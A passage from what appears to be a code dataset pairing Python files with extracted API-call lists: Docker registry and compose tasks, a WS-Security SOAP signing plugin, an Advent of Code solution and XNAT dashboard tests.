phylo2 = ce.PhyloSet(phylo_prots)
phylo2.set_indexer(thresh=7)
for pt in phylo2.prots: # temporary fix for duplicated locus ids in the same msa
pt.msa = pt.msa[~pt.msa.index.duplicated(keep='first')]
phylo2.set_sim_mat()
protsmats,pairmats,pairrandmats,sca_score,sca_score2 = ce.sca(ps,phylo2,delta=0.0001)
for pt,sca in it.izip(ps.prots,protsmats): pt.sca_mat = sca
for pair,sca_cat in it.izip(ps.pairs,pairmats): pair.sca_mat = sca_cat
np.save('GettingStartedSCACalcs.npy',ps)
print(sca_score2)
| [
"coevo2.ProtSet",
"itertools.izip",
"coevo2.PhyloSet",
"coevo2.sca",
"numpy.save",
"coevo2.prots_from_scratch"
] | [((253, 299), 'coevo2.prots_from_scratch', 'ce.prots_from_scratch', (['names'], {'path2alg': 'algPath'}), '(names, path2alg=algPath)\n', (274, 299), True, 'import coevo2 as ce\n'), ((304, 328), 'coevo2.ProtSet', 'ce.ProtSet', (['prots', 'names'], {}), '(prots, names)\n', (314, 328), True, 'import coevo2 as ce\n'), ((425, 510), 'coevo2.prots_from_scratch', 'ce.prots_from_scratch', (['phylo_names'], {'path2alg': '"""TestSet/eggNOG_aligns/phylogenes/"""'}), "(phylo_names, path2alg='TestSet/eggNOG_aligns/phylogenes/'\n )\n", (446, 510), True, 'import coevo2 as ce\n'), ((515, 539), 'coevo2.PhyloSet', 'ce.PhyloSet', (['phylo_prots'], {}), '(phylo_prots)\n', (526, 539), True, 'import coevo2 as ce\n'), ((788, 820), 'coevo2.sca', 'ce.sca', (['ps', 'phylo2'], {'delta': '(0.0001)'}), '(ps, phylo2, delta=0.0001)\n', (794, 820), True, 'import coevo2 as ce\n'), ((834, 862), 'itertools.izip', 'it.izip', (['ps.prots', 'protsmats'], {}), '(ps.prots, protsmats)\n', (841, 862), True, 'import itertools as it\n'), ((900, 927), 'itertools.izip', 'it.izip', (['ps.pairs', 'pairmats'], {}), '(ps.pairs, pairmats)\n', (907, 927), True, 'import itertools as it\n'), ((951, 992), 'numpy.save', 'np.save', (['"""GettingStartedSCACalcs.npy"""', 'ps'], {}), "('GettingStartedSCACalcs.npy', ps)\n", (958, 992), True, 'import numpy as np\n')] |
import os
import re
import requests
from invoke import task
def _get_aws_token(c):
token = os.getenv("AWS_TOKEN")
if not token:
token = c.run("aws ecr get-authorization-token --output text "
"--query 'authorizationData[].authorizationToken'", hide=True).stdout.strip()
return token
def _get_gcloud_token(c):
token = os.getenv("GCLOUD_TOKEN")
if not token:
token = c.run("gcloud auth print-access-token", hide=True).stdout.strip()
return token
def _version_to_int(version):
"""Converts a version number into an integer number, so it can be sorted
>>> _version_to_int("0.1.1")
1001
>>> _version_to_int("1.2.3")
1002003
>>> _version_to_int("2001")
2001
>>> _version_to_int("latest")
0
"""
if version == "latest":
return 0
components = version.split(".")
ret = 0
for i, comp in enumerate(components):
ret += int(comp) * (1000 ** (len(components) - (i + 1)))
return ret
def _registry_type(registry):
if "amazonaws" in registry:
return "aws"
elif "gcr.io" in registry:
return "googlecloud"
elif "icr.io" in registry:
return "ibmcloud"
elif registry == "":
return "dockerhub"
else:
return "unknown"
def _join(registry, image):
if not registry:
return image
return "{}/{}".format(registry, image)
def _auth_headers(c, registry):
    """Build ``requests`` keyword arguments carrying credentials for *registry*.

    AWS uses a Basic auth header; Google Cloud uses oauth2 basic auth;
    other registries get no credentials.
    """
    kind = _registry_type(registry)
    if kind == "aws":
        basic = _get_aws_token(c)
        return {"headers": {"Authorization": f"Basic {basic}"}}
    if kind == "googlecloud":
        return {"auth": ("oauth2accesstoken", _get_gcloud_token(c))}
    return {}
def _get_last_version_from_local_docker(c, registry, image):
    """Return the highest tag of *image* known to the local docker daemon."""
    target = _join(registry, image)
    listing = c.run(f"docker image ls {target}", hide="out")
    # Skip the header row; the tag is the second whitespace-separated column.
    tags = [re.split(" +", row)[1] for row in listing.stdout.splitlines()[1:]]
    return sorted(tags, key=_version_to_int)[-1]
def _get_last_version(c, registry, image):
    """Return the highest existing tag for *image* in *registry*.

    Queries the registry's v2 tags API where supported; falls back to the
    local docker daemon for IBM Cloud and Docker Hub.
    """
    if _registry_type(registry) in ("ibmcloud", "dockerhub"):
        # fallback, don't know how to get tabs from ibmcloud registry
        return _get_last_version_from_local_docker(c, registry, image)
    response = requests.get(
        f"https://{registry}/v2/{image}/tags/list", **_auth_headers(c, registry)
    )
    response.raise_for_status()
    tags = response.json()["tags"]
    if len(tags) == 100:
        raise RuntimeError(
            "Error, the response has 100 tags, we hit the limit and paging not supported, "
            "you should remove some tags in ECR console"
        )
    return sorted(tags, key=_version_to_int)[-1]
def _get_next_version(c, registry, image):
    """Return the last known tag with its final numeric component bumped by 1."""
    registry, image = _default_registry_image(c, registry, image)
    current = _get_last_version(c, registry, image)
    head, _, tail = current.rpartition('.')
    bumped = str(int(tail) + 1)
    return head + '.' + bumped if head else bumped
def _default_registry_image(c, registry, image):
if not registry:
registry = c.config.registry
if not image:
image = c.config.image
return registry, image
@task
def last_version(c, registry=None, image=None):
    """Print the most recent tag of the (default or given) registry/image."""
    reg, img = _default_registry_image(c, registry, image)
    print(_get_last_version(c, reg, img))
@task
def next_version(c, registry=None, image=None):
    """Print the tag that would be assigned to the next build."""
    reg, img = _default_registry_image(c, registry, image)
    print(_get_next_version(c, reg, img))
def docker_exec(c, command, container=None, pty=True, envs=None, workdir=None):
    """Run *command* inside a container via ``docker exec``.

    :param c: invoke context used to run the host command.
    :param command: command line executed inside the container.
    :param container: target container; defaults to ``c.config.container``.
    :param pty: allocate an interactive TTY (adds ``-it``).
    :param envs: mapping of environment variables passed with ``--env``.
    :param workdir: working directory inside the container (``-w``).

    Host environment variables named ``DOCKEREXEC_<NAME>`` are also
    forwarded into the container as ``<NAME>``.

    Fixes: the ``-w`` fragment previously lacked a trailing space, gluing
    the next flag onto the workdir path; ``envs`` was a mutable default.
    """
    container = container or c.config.container
    run_command = "docker exec "
    if pty:
        run_command += "-it "
    if workdir:
        # Trailing space required so the next flag is not concatenated.
        run_command += f"-w {workdir} "
    envs = envs or {}
    for env_var, env_value in envs.items():
        run_command += f"--env {env_var}={env_value} "
    for k, env_value in os.environ.items():
        if k.startswith("DOCKEREXEC_"):
            env_var = k.split('_', 1)[1]
            run_command += f"--env {env_var}={env_value} "
    c.run("{} {} {}".format(run_command, container, command), pty=pty)
@task
def docker_put(c, source, target, container=None):
    """Copy host file *source* to *target* inside the container."""
    dest = container or c.config.container
    c.run(f"docker cp {source} {dest}:{target}")
@task
def docker_get(c, source, target, container=None):
    """Copy *source* out of the container to host path *target*."""
    src = container or c.config.container
    c.run(f"docker cp {src}:{source} {target}")
def _compose_file():
return os.getenv("COMPOSE_FILE", "docker-compose.yml")
@task
def start_dev(c, compose_files="docker-compose.override.dev.yml,docker-compose.override.local-dev.yml",
              detach=True):
    """Bring the dev stack up, layering whichever override files exist."""
    overrides = ""
    for candidate in compose_files.split(","):
        if os.path.exists(candidate):
            overrides += f"-f {candidate} "
    flag = "-d" if detach else ""
    c.run(f"docker-compose -f {_compose_file()} {overrides} up --build {flag}")
@task
def start(c, detach=True):
    """Build and start the stack with docker-compose."""
    flag = "-d" if detach else ""
    c.run(f"docker-compose -f {_compose_file()} up --build {flag}")
@task
def stop(c):
    """Stop and remove the stack.

    Bug fix: ``-f`` is a *global* docker-compose option and must precede the
    subcommand; ``docker-compose down -f <file>`` is rejected by the CLI.
    """
    c.run(f"docker-compose -f {_compose_file()} down")
@task
def shell(c):
    """Open an interactive shell inside the configured container."""
    docker_exec(c, c.config.get("container_shell", "sh"))
@task
def pyshell(c):
    """Open an interactive Python shell inside the configured container."""
    docker_exec(c, c.config.get("container_pyshell", "ipython"))
@task
def build(c, registry=None, image=None, version=None):
    """Build the docker image, tagging it with the next (or given) version."""
    registry, image = _default_registry_image(c, registry, image)
    tag = version or _get_next_version(c, registry, image)
    c.run("docker build -t {}:{} .".format(_join(registry, image), tag))
@task
def push_image(c, registry=None, image=None, version=None):
    """Push the image tag to the registry, logging in to ECR when needed."""
    registry, image = _default_registry_image(c, registry, image)
    if not version:
        if _registry_type(registry) in ("ibmcloud", "dockerhub"):
            version = _get_last_version_from_local_docker(c, registry, image)
        else:
            version = _get_next_version(c, registry, image)
    if _registry_type(registry) == "aws":
        # `aws ecr get-login` prints a ready-made `docker login ...` command.
        login_cmd = c.run("aws ecr get-login --no-include-email", hide=True).stdout
        c.run(login_cmd)
    c.run("docker push {}:{}".format(_join(registry, image), version))
| [
"os.environ.items",
"os.path.exists",
"os.getenv",
"re.split"
] | [((97, 119), 'os.getenv', 'os.getenv', (['"""AWS_TOKEN"""'], {}), "('AWS_TOKEN')\n", (106, 119), False, 'import os\n'), ((366, 391), 'os.getenv', 'os.getenv', (['"""GCLOUD_TOKEN"""'], {}), "('GCLOUD_TOKEN')\n", (375, 391), False, 'import os\n'), ((4004, 4022), 'os.environ.items', 'os.environ.items', ([], {}), '()\n', (4020, 4022), False, 'import os\n'), ((4592, 4639), 'os.getenv', 'os.getenv', (['"""COMPOSE_FILE"""', '"""docker-compose.yml"""'], {}), "('COMPOSE_FILE', 'docker-compose.yml')\n", (4601, 4639), False, 'import os\n'), ((4862, 4890), 'os.path.exists', 'os.path.exists', (['compose_file'], {}), '(compose_file)\n', (4876, 4890), False, 'import os\n'), ((2035, 2054), 're.split', 're.split', (['""" +"""', 'lin'], {}), "(' +', lin)\n", (2043, 2054), False, 'import re\n')] |
#!/usr/bin/env python
from __future__ import with_statement
from suds.plugin import MessagePlugin
from lxml import etree
from suds.bindings.binding import envns
from suds.wsse import wsuns, dsns, wssens
from libxml2_wrapper import LibXML2ParsedDocument
from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec
from OpenSSL import crypto
from uuid import uuid4
import xmlsec
def lxml_ns(suds_ns):
    """Turn a single suds (prefix, uri) pair into an lxml nsmap dict."""
    prefix, uri = suds_ns
    return {prefix: uri}
def lxml_nss(suds_ns):
    """Turn an iterable of suds (prefix, uri) pairs into an lxml nsmap dict.

    Idiom fix: ``dict()`` consumes (key, value) pairs directly, so the
    manual accumulation loop is unnecessary. Behavior is unchanged.
    """
    return dict(suds_ns)
def ns_id(tagname, suds_ns):
    """Return *tagname* in Clark notation: ``{uri}tagname``."""
    return '{%s}%s' % (suds_ns[1], tagname)
# Constants missing in xmlsec.strings
AttrEncodingType = 'EncodingType'
AttrValueType = 'ValueType'
NodeBinarySecurityToken = 'BinarySecurityToken'
NodeSecurity = 'Security'
NodeSecurityTokenReference = 'SecurityTokenReference'
# lxml nsmap containing only the SOAP envelope namespace
LXML_ENV = lxml_ns(envns)
# Pre-compiled XPaths locating the envelope parts we sign or modify
BODY_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Body', namespaces=LXML_ENV)
HEADER_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Header', namespaces=LXML_ENV)
SECURITY_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Header/wsse:Security', namespaces=lxml_nss([envns, wssens]))
TIMESTAMP_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Header/wsse:Security/wsu:Timestamp', namespaces=lxml_nss([envns, wssens, wsuns]))
# WS-Security encoding-type / X.509 token-profile identifiers
B64ENC = 'http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary'
X509PROFILE = 'http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3'
# wsu:Id linking the signature's KeyInfo to the BinarySecurityToken
CERTREF = 'x509cert00'
# PEM armour lines stripped before embedding the certificate in the token
BEGINCERT = "-----BEGIN CERTIFICATE-----"
ENDCERT = "-----END CERTIFICATE-----"
NSMAP = dict((dsns, wssens, wsuns))
# Frequently used qualified tag names (Clark notation)
WSU_ID = ns_id(xmlsec.AttrId, wsuns)
DS_DIGEST_VALUE = ns_id(xmlsec.NodeDigestValue, dsns)
DS_REFERENCE = ns_id(xmlsec.NodeReference, dsns)
DS_TRANSFORMS = ns_id(xmlsec.NodeTransforms, dsns)
WSSE_BST = ns_id(NodeBinarySecurityToken, wssens)
DS_SIGNATURE = ns_id(xmlsec.NodeSignature, dsns)
class SignerPlugin(MessagePlugin):
    """suds MessagePlugin that signs outgoing SOAP messages (WS-Security).

    Adds a wsse:Security header carrying an X.509 BinarySecurityToken and
    an XML-DSig signature over the configured message parts (by default
    the SOAP Body and the wsu:Timestamp), then signs with xmlsec.
    """
    def __init__(self,
            keyfile,
            items_to_sign=None,
            keytype=None,
            pwd=None, pwdCallback=None, pwdCallbackCtx=None,
            transform_algorithm=None,
            digestmethod_algorithm=None,
            transform_count=None):
        """Initialise xmlsec and load the PEM *keyfile* (cert + private key).

        items_to_sign: XPath objects (or (xpath, id) pairs) selecting the
        elements to sign; defaults to Body and Timestamp.
        keytype: xmlsec signature-method href; auto-detected when None.
        """
        init_xmlsec()
        self.keyfile = keyfile
        self.pwd = pwd
        self.pwdCallback = pwdCallback
        self.pwdCallbackCtx = pwdCallbackCtx
        self.load_keyfile()
        self.keytype = self.handle_keytype(keytype)
        self.items_to_sign = items_to_sign or [BODY_XPATH, TIMESTAMP_XPATH]
        self.transform_algorithm = transform_algorithm or xmlsec.HrefExcC14N
        self.digestmethod_algorithm = digestmethod_algorithm or xmlsec.HrefSha1
        self.transform_count = transform_count or 1
    def load_keyfile(self):
        """Read the PEM file; it must contain both certificate and key."""
        cert = file(self.keyfile, 'rb').read()
        self.cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert)
        self.privatekey = crypto.load_privatekey(crypto.FILETYPE_PEM, cert)
    def handle_keytype(self, keytype):
        """Validate *keytype* (string) or auto-detect it when None."""
        if keytype is None:
            return self.detect_keytype()
        elif any(isinstance(keytype, t) for t in (str, unicode)):
            return keytype
        else:
            raise ValueError('keytype must be a string or None')
    def detect_keytype(self):
        """Map the private key's algorithm (DSA/RSA) to the xmlsec href."""
        algo = self.privatekey.type()
        if algo == crypto.TYPE_DSA:
            return xmlsec.HrefDsaSha1
        if algo == crypto.TYPE_RSA:
            return xmlsec.HrefRsaSha1
        raise ValueError('unknown keytype')
    def marshalled(self, context):
        # !!! Axis needs the same namespace as Header and Envelope
        context.envelope[1].prefix = context.envelope.prefix
        pass
    def sending(self, context):
        """
        sending plugin method: mark elements to sign, add the wsse:Security
        header with the BinarySecurityToken and signature template, then
        produce the signed envelope.
        """
        env = etree.fromstring(context.envelope)
        queue = SignQueue(self.transform_algorithm, self.digestmethod_algorithm, self.transform_count)
        for item_to_sign in self.items_to_sign:
            # Items may be bare XPaths or (xpath, explicit wsu:Id) pairs.
            if isinstance(item_to_sign, tuple):
                (item_path, item_id) = item_to_sign
            else:
                (item_path, item_id) = (item_to_sign, None)
            for item_elem in item_path(env):
                queue.push_and_mark(item_elem, item_id)
        security = ensure_security_header(env, queue)
        btkn = etree.SubElement(security, WSSE_BST, {
            AttrEncodingType: B64ENC,
            AttrValueType: X509PROFILE,
            WSU_ID: CERTREF,
        }, NSMAP)
        # Embed the bare base64 certificate: strip PEM armour and newlines.
        crt = crypto.dump_certificate(crypto.FILETYPE_PEM, self.cert)
        crt = crt.replace('\n', '').replace(BEGINCERT, '').replace(ENDCERT, '')
        btkn.text = crt
        self.insert_signature_template(security, queue)
        context.envelope = self.get_signature(etree.tostring(env))
    def insert_signature_template(self, security, queue):
        """Append the ds:Signature template (SignedInfo, Value, KeyInfo)."""
        signature = etree.SubElement(security, DS_SIGNATURE)
        self.append_signed_info(signature, queue)
        # Empty SignatureValue node; xmlsec fills it in during signing.
        etree.SubElement(signature, ns_id(xmlsec.NodeSignatureValue, dsns))
        self.append_key_info(signature)
    def append_signed_info(self, signature, queue):
        """Add ds:SignedInfo with c14n/signature methods plus the references."""
        signed_info = etree.SubElement(signature, ns_id(xmlsec.NodeSignedInfo, dsns))
        set_algorithm(signed_info, xmlsec.NodeCanonicalizationMethod, self.transform_algorithm)
        set_algorithm(signed_info, xmlsec.NodeSignatureMethod, self.keytype)
        queue.insert_references(signed_info)
    def append_key_info(self, signature):
        """Add ds:KeyInfo pointing at the BinarySecurityToken and X509 data."""
        key_info = etree.SubElement(signature, ns_id(xmlsec.NodeKeyInfo, dsns))
        sec_token_ref = etree.SubElement(key_info,
                ns_id(NodeSecurityTokenReference, wssens))
        etree.SubElement(sec_token_ref, ns_id(xmlsec.NodeReference, wssens), {
            xmlsec.AttrURI: '#%s' % CERTREF,
            AttrValueType: X509PROFILE,
        })
        x509_data = etree.SubElement(sec_token_ref, ns_id(xmlsec.NodeX509Data, dsns))
        x509_issuer_serial = etree.SubElement(x509_data,
                ns_id(xmlsec.NodeX509IssuerSerial, dsns))
        x509_issuer_name = etree.SubElement(x509_issuer_serial,
                ns_id(xmlsec.NodeX509IssuerName, dsns))
        # Issuer DN rendered as "C=.., O=.., CN=.." component pairs.
        x509_issuer_name.text = ', '.join(
            '='.join(c) for c in self.cert.get_issuer().get_components())
        x509_serial_number = etree.SubElement(x509_issuer_serial,
                ns_id(xmlsec.NodeX509SerialNumber, dsns))
        x509_serial_number.text = str(self.cert.get_serial_number())
    def get_signature(self, envelope):
        """Parse *envelope*, run the xmlsec signing pass, return signed XML."""
        with LibXML2ParsedDocument(envelope) as doc:
            root = doc.getRootElement()
            # Register wsu:Id attributes so the references can resolve.
            xmlsec.addIDs(doc, root, [xmlsec.AttrId])
            signNode = xmlsec.findNode(root, xmlsec.NodeSignature, xmlsec.DSigNs)
            with XmlSecSignatureContext(self) as dsig_ctx:
                if dsig_ctx.sign(signNode) < 0:
                    raise RuntimeError('signature failed')
            return doc.serialize()
    def __del__(self):
        # Release xmlsec global state when the plugin is garbage-collected.
        deinit_xmlsec()
class SignQueue(object):
    """Collects wsu:Id-marked elements and emits their ds:Reference entries."""

    def __init__(self, transform_algorithm, digestmethod_algorithm, transform_count):
        self.transform_algorithm = transform_algorithm
        self.digestmethod_algorithm = digestmethod_algorithm
        self.transform_count = transform_count
        self.queue = []

    def push_and_mark(self, element, unique_id=None):
        """Tag *element* with a wsu:Id (generated unless given) and queue it."""
        uid = unique_id or get_unique_id()
        element.set(WSU_ID, uid)
        self.queue.append(uid)

    def insert_references(self, signed_info):
        """Append one ds:Reference per queued id under *signed_info*."""
        for ref_id in self.queue:
            ref = etree.SubElement(signed_info, DS_REFERENCE,
                    {xmlsec.AttrURI: '#{0}'.format(ref_id)})
            # One Transforms container holding the configured number of
            # identical transform entries.
            transforms = etree.SubElement(ref, DS_TRANSFORMS)
            for _ in range(self.transform_count):
                set_algorithm(transforms, xmlsec.NodeTransform, self.transform_algorithm)
            set_algorithm(ref, xmlsec.NodeDigestMethod, self.digestmethod_algorithm)
            # Empty DigestValue; xmlsec computes it while signing.
            etree.SubElement(ref, DS_DIGEST_VALUE)
def get_unique_id():
    """Return a fresh wsu:Id value of the form ``id-<uuid4>``."""
    return 'id-%s' % uuid4()
def set_algorithm(parent, name, value):
    """Append a ds:<name> child to *parent* carrying an Algorithm attribute."""
    attrs = {xmlsec.AttrAlgorithm: value}
    etree.SubElement(parent, ns_id(name, dsns), attrs)
def ensure_security_header(env, queue):
    """Return the wsse:Security header of *env*, creating it when absent."""
    (header,) = HEADER_XPATH(env)
    existing = SECURITY_XPATH(header)
    if existing:
        return existing[0]
    attrs = {}
    #!!! With Axis 1.x this does not work
    #attrs[ns_id('mustUnderstand', envns)] = '1'
    return etree.SubElement(header, ns_id(NodeSecurity, wssens), attrs, NSMAP)
| [
"xmlsec.addIDs",
"lxml.etree.XPath",
"OpenSSL.crypto.dump_certificate",
"lxml.etree.SubElement",
"xmlsec_wrapper.XmlSecSignatureContext",
"libxml2_wrapper.LibXML2ParsedDocument",
"OpenSSL.crypto.load_privatekey",
"xmlsec_wrapper.deinit_xmlsec",
"uuid.uuid4",
"lxml.etree.fromstring",
"xmlsec_wrap... | [((897, 965), 'lxml.etree.XPath', 'etree.XPath', (['"""/SOAP-ENV:Envelope/SOAP-ENV:Body"""'], {'namespaces': 'LXML_ENV'}), "('/SOAP-ENV:Envelope/SOAP-ENV:Body', namespaces=LXML_ENV)\n", (908, 965), False, 'from lxml import etree\n'), ((981, 1051), 'lxml.etree.XPath', 'etree.XPath', (['"""/SOAP-ENV:Envelope/SOAP-ENV:Header"""'], {'namespaces': 'LXML_ENV'}), "('/SOAP-ENV:Envelope/SOAP-ENV:Header', namespaces=LXML_ENV)\n", (992, 1051), False, 'from lxml import etree\n'), ((2307, 2320), 'xmlsec_wrapper.init_xmlsec', 'init_xmlsec', ([], {}), '()\n', (2318, 2320), False, 'from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec\n'), ((2920, 2970), 'OpenSSL.crypto.load_certificate', 'crypto.load_certificate', (['crypto.FILETYPE_PEM', 'cert'], {}), '(crypto.FILETYPE_PEM, cert)\n', (2943, 2970), False, 'from OpenSSL import crypto\n'), ((2997, 3046), 'OpenSSL.crypto.load_privatekey', 'crypto.load_privatekey', (['crypto.FILETYPE_PEM', 'cert'], {}), '(crypto.FILETYPE_PEM, cert)\n', (3019, 3046), False, 'from OpenSSL import crypto\n'), ((3902, 3936), 'lxml.etree.fromstring', 'etree.fromstring', (['context.envelope'], {}), '(context.envelope)\n', (3918, 3936), False, 'from lxml import etree\n'), ((4467, 4587), 'lxml.etree.SubElement', 'etree.SubElement', (['security', 'WSSE_BST', '{AttrEncodingType: B64ENC, AttrValueType: X509PROFILE, WSU_ID: CERTREF}', 'NSMAP'], {}), '(security, WSSE_BST, {AttrEncodingType: B64ENC,\n AttrValueType: X509PROFILE, WSU_ID: CERTREF}, NSMAP)\n', (4483, 4587), False, 'from lxml import etree\n'), ((4661, 4716), 'OpenSSL.crypto.dump_certificate', 'crypto.dump_certificate', (['crypto.FILETYPE_PEM', 'self.cert'], {}), '(crypto.FILETYPE_PEM, self.cert)\n', (4684, 4716), False, 'from OpenSSL import crypto\n'), ((5023, 5063), 'lxml.etree.SubElement', 'etree.SubElement', (['security', 'DS_SIGNATURE'], {}), '(security, DS_SIGNATURE)\n', (5039, 5063), False, 'from lxml import etree\n'), ((7136, 7151), 
'xmlsec_wrapper.deinit_xmlsec', 'deinit_xmlsec', ([], {}), '()\n', (7149, 7151), False, 'from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec\n'), ((8484, 8491), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (8489, 8491), False, 'from uuid import uuid4\n'), ((4923, 4942), 'lxml.etree.tostring', 'etree.tostring', (['env'], {}), '(env)\n', (4937, 4942), False, 'from lxml import etree\n'), ((6683, 6714), 'libxml2_wrapper.LibXML2ParsedDocument', 'LibXML2ParsedDocument', (['envelope'], {}), '(envelope)\n', (6704, 6714), False, 'from libxml2_wrapper import LibXML2ParsedDocument\n'), ((6775, 6816), 'xmlsec.addIDs', 'xmlsec.addIDs', (['doc', 'root', '[xmlsec.AttrId]'], {}), '(doc, root, [xmlsec.AttrId])\n', (6788, 6816), False, 'import xmlsec\n'), ((6840, 6898), 'xmlsec.findNode', 'xmlsec.findNode', (['root', 'xmlsec.NodeSignature', 'xmlsec.DSigNs'], {}), '(root, xmlsec.NodeSignature, xmlsec.DSigNs)\n', (6855, 6898), False, 'import xmlsec\n'), ((7969, 8011), 'lxml.etree.SubElement', 'etree.SubElement', (['reference', 'DS_TRANSFORMS'], {}), '(reference, DS_TRANSFORMS)\n', (7985, 8011), False, 'from lxml import etree\n'), ((8389, 8433), 'lxml.etree.SubElement', 'etree.SubElement', (['reference', 'DS_DIGEST_VALUE'], {}), '(reference, DS_DIGEST_VALUE)\n', (8405, 8433), False, 'from lxml import etree\n'), ((6916, 6944), 'xmlsec_wrapper.XmlSecSignatureContext', 'XmlSecSignatureContext', (['self'], {}), '(self)\n', (6938, 6944), False, 'from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec\n')] |
#!/usr/bin/env python3
import re
# Use a context manager so the input file handle is closed deterministically
# (the original left it open for the life of the process).
with open("5.in", 'r') as inputFile:
    inputContents = inputFile.readlines()
def isNice(_str):
    """Return True if *_str* is "nice" (Advent of Code 2015, day 5, part 1).

    A string is nice when it has at least three vowels, at least one
    doubled letter, and none of the substrings ab, cd, pq, xy.

    Fixes: the vowel check built a throwaway list of ``ord()`` values just
    to count vowels; the ``{1,}`` quantifier on the backreference was
    redundant.
    """
    vowel_count = sum(_str.count(v) for v in "aeiou")
    has_double = re.search(r'([a-z])\1', _str) is not None
    has_forbidden = re.search(r'ab|cd|pq|xy', _str) is not None
    return vowel_count >= 3 and has_double and not has_forbidden
# Count nice strings; bool results are summed as 0/1, so the manual
# accumulator loop collapses to a single sum().
niceCount = sum(isNice(line.strip()) for line in inputContents)
print(niceCount)
| [
"re.search"
] | [((182, 215), 're.search', 're.search', (['"""([a-z])\\\\1{1,}"""', '_str'], {}), "('([a-z])\\\\1{1,}', _str)\n", (191, 215), False, 'import re\n'), ((232, 264), 're.search', 're.search', (['"""(ab|cd|pq|xy)"""', '_str'], {}), "('(ab|cd|pq|xy)', _str)\n", (241, 264), False, 'import re\n')] |
from xnat_dashboards.data_cleaning import graph_generator
from xnat_dashboards import config
# Point the dashboard at the test fixture files before any module under
# test reads these paths.
config.DASHBOARD_CONFIG_PATH = 'xnat_dashboards/config/dashboard_config.json'
config.PICKLE_PATH = 'xnat_dashboards/config/general.pickle'
def create_mocker(
        mocker, username, data, role, graph_visibility, return_get_project_list,
        project_visible=None):
    """Stub out DataFilter and return a GraphGenerator ready for testing.

    DataFilter's constructor, project listing and graph reordering are
    replaced by canned return values so only GraphGenerator is exercised.
    """
    base = 'xnat_dashboards.data_cleaning.data_filter.DataFilter.'
    stubbed = (
        ('__init__', None),
        ('get_project_list', return_get_project_list),
        ('reorder_graphs', data['info']),
    )
    for method, retval in stubbed:
        mocker.patch(base + method, return_value=retval)
    return graph_generator.GraphGenerator(
        username, role, data, {role: ['p1', 'y']})
def test_graph_preprocessor(mocker):
    """add_graph_fields returns a dict for dict input and [] for empty input."""
    data = {
        'info': {
            "Age Range": {"x1": "y1", "x2": "y2"},
            "Gender": {"x1": "y1", "x2": "y2"},
            "Handedness": {"x1": "y1", "x2": "y2"},
            "Experiments/Project": {"x1": "y1", "x2": "y2"}, "Stats": {}
        },
        'resources': {},
        'longitudinal_data': {}
    }

    def fresh_projects(populated):
        # Build a new dict per call so no state is shared between mocks.
        if populated:
            return {'project_list': ['p1', 'p2'],
                    'project_list_ow_co_me': ['p3', 'p4']}
        return {'project_list': [], 'project_list_ow_co_me': []}

    gen = create_mocker(mocker, 'testUser', data, 'admin', ['*'],
                        fresh_projects(True))
    assert isinstance(gen.add_graph_fields(data['info']), dict)

    gen = create_mocker(mocker, 'testUser', data, 'admin', ["*"],
                        fresh_projects(False))
    assert isinstance(gen.add_graph_fields(data['info']), dict)

    gen = create_mocker(mocker, 'testUser', data, 'admin', ["*"],
                        fresh_projects(False))
    assert gen.add_graph_fields([]) == []
def test_graph_generator(mocker):
    """get_overview returns a [graphs-list, stats-dict] pair.

    Improvement: the original called ``get_overview()`` three times, once
    per assertion; the result is now computed once and re-checked.
    """
    data = {
        'info': {
            "Age Range": {"x1": "y1", "x2": "y2"},
            "Gender": {"x1": "y1", "x2": "y2"},
            "Handedness": {"x1": "y1", "x2": "y2"},
            "Stats": {}},
        "Experiments/Project": {"x1": "y1", "x2": "y2"},
        "resources": {},
        'longitudinal_data': {}}
    graph_object = create_mocker(
        mocker, 'testUser', data, 'admin', ["*"],
        {'project_list': ['p1', 'p2'], 'project_list_ow_co_me': ['p3', 'p4']})
    overview = graph_object.get_overview()
    assert isinstance(overview, list)
    assert isinstance(overview[0], list)
    assert isinstance(overview[1], dict)
def test_project_list_generator(mocker):
    """get_project_list returns nested lists, or passes odd input through."""
    data = {
        "info": {
            "Age Range": {"x1": "y1", "x2": "y2"},
            "Gender": {"x1": "y1", "x2": "y2"},
            "Handedness": {"x1": "y1", "x2": "y2"},
            "Stats": {}},
        "Experiments/Project": {"x1": "y1", "x2": "y2"},
        "resources": {},
        'longitudinal_data': {}}

    gen = create_mocker(
        mocker, 'testUser', data, 'admin', ['p1'],
        {'project_list': ['p1', 'p2'], 'project_list_ow_co_me': ['p3', 'p4']})
    listing = gen.get_project_list()
    assert isinstance(listing, list)
    assert isinstance(listing[0], list)
    assert isinstance(listing[1], list)

    # Empty project lists collapse to nested empty lists.
    gen = create_mocker(
        mocker, 'testUser', data, 'admin', ["*"],
        {'project_list': [], 'project_list_ow_co_me': []})
    assert gen.get_project_list() == [[[]], [[]]]

    # Non-list values are returned unchanged.
    gen = create_mocker(
        mocker, 'testUser', data, 'admin', ["*"],
        {'project_list': 1, 'project_list_ow_co_me': 1})
    assert gen.get_project_list() == 1
def test_graph_generator_longitudinal(mocker):
    """get_longitudinal_graphs returns a list for empty longitudinal data."""
    longitudinal = {
        "Projects": {}, "Subjects": {}, "Experiments": {},
        "Scans": {}, "Resources": {}}
    data = {
        "info": {
            "Age Range": {"x1": "y1", "x2": "y2"},
            "Gender": {"x1": "y1", "x2": "y2"},
            "Handedness": {"x1": "y1", "x2": "y2"},
            "Stats": {}},
        "Experiments/Project": {"x1": "y1", "x2": "y2"},
        "resources": {},
        'longitudinal_data': longitudinal}
    gen = create_mocker(
        mocker, 'testUser', data, 'admin', ['p1'],
        {'project_list': ['p1', 'p2'], 'project_list_ow_co_me': ['p3', 'p4']})
    assert isinstance(gen.get_longitudinal_graphs(), list)
| [
"xnat_dashboards.data_cleaning.graph_generator.GraphGenerator"
